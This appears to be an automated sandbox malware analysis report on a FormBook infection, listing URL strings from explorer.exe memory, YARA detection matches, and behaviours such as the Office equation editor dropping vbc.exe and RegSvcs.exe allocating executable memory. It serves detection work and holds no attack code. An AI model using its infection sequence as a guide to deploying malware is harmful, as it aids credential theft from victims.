          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000007.00000000.2107641557.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2113263958.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.2114590389.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehps
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpXm
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.2120970745.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000007.00000000.2113858864.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.2113887423.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1#
          Source: explorer.exe, 00000007.00000000.2120612541.000000000842E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1y

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419D60 NtCreateFile,6_2_00419D60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419E10 NtReadFile,6_2_00419E10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419E90 NtClose,6_2_00419E90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419F40 NtAllocateVirtualMemory,6_2_00419F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00419E8A NtClose,6_2_00419E8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C00C4 NtCreateFile,LdrInitializeThunk,6_2_008C00C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_008C0048
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0078 NtResumeThread,LdrInitializeThunk,6_2_008C0078
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF9F0 NtClose,LdrInitializeThunk,6_2_008BF9F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF900 NtReadFile,LdrInitializeThunk,6_2_008BF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_008BFAD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_008BFAE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_008BFBB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_008BFB68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_008BFC90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk,6_2_008BFC60
